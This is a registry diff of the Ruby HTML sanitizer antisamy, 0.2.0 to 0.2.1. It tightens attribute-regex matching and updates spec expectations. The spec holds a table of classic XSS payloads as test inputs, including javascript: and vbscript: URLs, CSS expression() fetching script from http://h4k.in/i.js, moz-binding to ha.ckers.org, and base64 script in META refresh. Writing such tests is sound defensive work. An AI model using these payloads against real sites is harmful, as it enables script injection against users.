antisamy 0.2.0 → 0.2.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. data/lib/antisamy/html/sax_filter.rb +1 -1
  2. data/spec/antisamy_spec.rb +9 -3
  3. metadata +2 -2
data/lib/antisamy/html/sax_filter.rb CHANGED
@@ -177,7 +177,7 @@ module AntiSamy
177
177
  unless valid
178
178
  attrib.expressions.each do |ae|
179
179
  mc = ae.match(a_value)
180
- if mc and mc.size == a_value.size
180
+ if mc and mc.to_s == a_value
181
181
  valid_attributes << [a_name,a_value]
182
182
  valid = true
183
183
  break
data/spec/antisamy_spec.rb CHANGED
@@ -85,8 +85,8 @@ module AntiSamy
85
85
  "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
86
86
  "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
87
87
  "<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
88
- "<a . href=\"http://www.test.com\">" => "href",
89
- "<a - href=\"http://www.test.com\">" => "href",
88
+ "<a . href=\"http://www.test.com\">" => " . ",
89
+ "<a - href=\"http://www.test.com\">" => "-",
90
90
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
91
91
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
92
92
  "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
@@ -114,7 +114,7 @@ module AntiSamy
114
114
  "<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
115
115
  "<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
116
116
  "<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
117
- "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "href",
117
+ "<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
118
118
  "<b><i>Some Text</b></i>" => "<i />",
119
119
  "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
120
120
  "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
@@ -132,5 +132,11 @@ module AntiSamy
132
132
  r.clean_html.should_not be_empty
133
133
  end
134
134
 
135
+ it "should not touch this url" do
136
+ input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
137
+ r = AntiSamy.scan(input,policy_object)
138
+ r.clean_html.should == input
139
+ end
140
+
135
141
  end
136
142
  end
metadata CHANGED
@@ -2,7 +2,7 @@
2
2
  name: antisamy
3
3
  version: !ruby/object:Gem::Version
4
4
  prerelease:
5
- version: 0.2.0
5
+ version: 0.2.1
6
6
  platform: ruby
7
7
  authors:
8
8
  - Sal Scotto
@@ -174,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
174
174
  requirements:
175
175
  - - ">="
176
176
  - !ruby/object:Gem::Version
177
- hash: -3694882257398018241
177
+ hash: -3180054777523401817
178
178
  segments:
179
179
  - 0
180
180
  version: "0"